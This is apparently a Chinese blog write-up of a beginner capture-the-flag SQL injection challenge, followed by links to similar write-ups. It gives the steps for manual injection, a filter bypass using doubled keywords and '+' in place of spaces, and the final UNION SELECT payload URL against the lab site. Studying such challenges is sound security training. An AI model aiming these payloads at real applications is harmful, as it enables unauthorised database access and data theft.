简单的sql注入WP

最新推荐文章于 2024-05-16 14:48:19 发布
最新推荐文章于 2024-05-16 14:48:19 发布
阅读量1k 收藏
点赞数
文章标签: sql注入 火狐 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yalecaltech/article/details/63707789
版权

这题比较简单,我们就直接手工注入了
这里给大家推荐一个火狐插件hackbar,在做web题的时候还是挺好用的
下面开始介绍手工的流程:

1)输入1,提交,不报错
2)输入1‘,提交,报错,判断存在注入。
3)根据同类型题目的经验,初步预计后台表为flag,字段名为flag,需要构造union select flag from flag
4)根据第二步的报错信息看,多加个‘,后面的语句需要再构造一个条件来结束’,所以语句为:1‘ union select flag from flag where ‘t’=’t
执行后报错:heck the manual that corresponds to your MySQL server version for the right syntax to use near ‘flag flag ‘t’=’t” at line 1
结论:根据错误信息发现只有变量了,其他的关键字都被过滤了。
5)把关键字写2遍提交,报错: corresponds to your MySQL server version for the right syntax to use near ‘unionselectflag fromflag where’t’=’t” at line 1
结论:空格被过滤
6)于是我们使用+号在空格之前连接:
http://ctf5.shiyanbar.com/423/web/?id=1 ‘+unionunion +selectselect +flag+fromfrom +flag+wherewhere+’t’=’t
即可得到flag
这里写图片描述

Elwood Ying
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实验吧ctf-web题:简单sql注入
Elvira
08-25 1万+
简单sql注入 1. 基于报错的检测方法 2. 基于布尔的检测方法
实验吧简单sql注入之3WP
Yale的博客
03-19 1457
就上图不说话(sqlmap) 这种题目对于初学sqlmap的人还是很好玩的
CTF Web SQL注入专项整理(持续更新中)_ctf sql注入(1)
最新发布
2401_84969611的博客
05-16 491
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
一道sql注入wp
一个码农的笔记
10-18 1202
今天做了一道题目很有意思,题目的地址是:http://118.178.18.181:57019 这个是一个sql注入的题目 首先访问http://118.178.18.181:57019/index.php,查看网页源码的时候发现题目的提示:<!--view source /source.php-->于是访问:http://118.178.18.181:57019/source.php获得题目的
ctfshow web入门 sql注入wp(未完)
weixin_49436541的博客
03-08 6131
ctfshow sql注入
【N1BOOK】[第一章 web入门],sql注入1wp
weixin_51325053的博客
10-27 200
先判断为字符型注入 ?id = 2-1 无显示 ?id=1a 返回正常 在mysql中,等号两边如果类型不一致,则会发生强制转换。 当字符型和数字型数据比较,字符型将被强制性转换为数字 字符串“1a” 被强制性转换为1。 id后面输入1到3,返回正常,直到输入4,无回显,推测有三列 1’ order by 1,2,3%23 发现#被过滤,采用url对应编码%23 或者 用–+,也可以用作注释 继续查注入点 id=a’ union select 1,2,3%27 i.
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
【WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
arkainte_wp_onegen_sql_源码
10-02
4. **安全性**:在处理SQL源码时,必须考虑SQL注入攻击。Arkainte_wp.sql中的所有动态SQL都应使用参数化查询或预编译语句,以防止恶意输入。 5. **性能优化**:源码可能包含了针对WordPress数据库性能优化的SQL语句...
赛博地球杯工业互联网安全大赛wp1
08-03
WP1 中,我们还可以看到 sqlmap 工具的使用,sqlmap 是一种自动 SQL 注入工具,用于检测和利用 SQL 注入漏洞。 四、Web 应用安全 在 WP1 中,我们可以看到 Web 应用安全的相关知识点,例如输入验证、SQL 注入和...
SexyBeast233#SecBooks#CVE​​-2021-24285 WordPress Sql 注入1
07-25
插件名称:wp-plugin:cars-seller-auto-classifieds-script受影响的版本:2.1.0(如果有,则可能是较低版本)漏洞:注
wp-script-core
09-07
7. **安全实践**:在开发插件时,遵循最佳安全实践,如防止SQL注入、XSS攻击等。 8. **插件上传至WordPress官方目录**:如果想要让插件可供公众下载,需要了解如何将其提交到WordPress.org插件目录,遵循其提交指南...
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
实验吧简单SQL注入1,简单SQL注入
weixin_30770783的博客
05-07 176
接上面一篇博客。 实验吧简单sql注入1 题目连接 http://ctf5.shiyanbar.com/423/web/ 同样,直接输入 1加个但引号,结果下面有返回错误, , 有错,所以估计这里应该是要闭合,字符行注入,但是这个标题,到底过滤了什么,目前我还不知道过滤了什么,所以先搞一下。。 输入 1' and 1=1# 按理...
所谓最简单SQL注入
扯蛋的青春与蛋痛的生活
01-12 1924
今天没带眼镜,,所以不太想干活 也不知怎的, 对公司另一同事写的业务台模块来了兴趣..帮其"测试一下" 在VC的代码片段是 CString SqlText = "Select User_ID, Login_Name, Login_Pwd, Chinese_Name, Operation from A_Employee Where Login_Name = '" +
ctf简单SQL注入(1)
wuerror的博客
07-14 2331
ctf注入套路(一):从系统内置的库来找到flag所在的表。例子:点击打开链接(实验吧简单SQL注入之2,1也是同样的套路)先输入1,再输入1',页面报语法错误,再输入1 '页面出现SQLi detected!,推出空格被它过滤。用/**/来代替空格。输入 1'/**/union/**/select/**/schema_name/**/from/**/information_schema.sch...
实验吧---简单sql注入
mengtongxch的博客
10-19 503
通过注入获得flag值(提交格式:flag{})。 解题链接: http://ctf5.shiyanbar.com/423/web/ 首先呢点击这个链接,出现以下界面 当我们在框里面输入1,2,3的时候会出现一些东西,例如 用sqlmap扫描一下爆出其数据库,数据表,字段 参考网址:https://www.cnblogs.com/baifan261...
CTF实验吧简单sql注入。自己写的wp
qq_41326328的博客
05-04 1403
这次来写了一个wp,我是小白希望大神们可以指点,因为自己是一个人搞sql,有人指点能够少走很多弯路。 先看这一题,我刚进来居然还来了个乱码,不管了开始,看到这题目,命令注入得到flag,就想这一题无非就是绕过过滤,进行爆库爆数据得到flag 输入1,2,3以后,得到一些表名,这时就在猜想后台sql查询语句为:select name where id =xxxxx; 先判断注入点 先用1 an...
简单sql注入-实验吧 Writeup
KRDecad3的博客
11-08 582
简单sql注入-实验吧 Writeup 看了网上很多Writeup,对过滤的解释有好几种,看的很迷糊,因此就自己实践实践,写下来整理一下思路。 题目链接 输入1,返回查询的ID和name: 然后输入1' 报错: 由此可知,存在字符型注入。 输入1' and 1=1--+,也会报错: 那么这里首先可以看到过滤掉了注释符, 不去闭合单引号:1 and 1=1 可以看到过滤掉了and和注释符。 ...
ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 4343
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
wordpress sql注入复现
04-29
WordPress SQL注入漏洞是指攻击者通过构造恶意SQL语句,利用WordPress的SQL查询接口,成功地向WordPress数据库中插入或者篡改数据,甚至可以直接获取管理员权限。以下是一个简单的复现过程: 1. 在WordPress网站的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值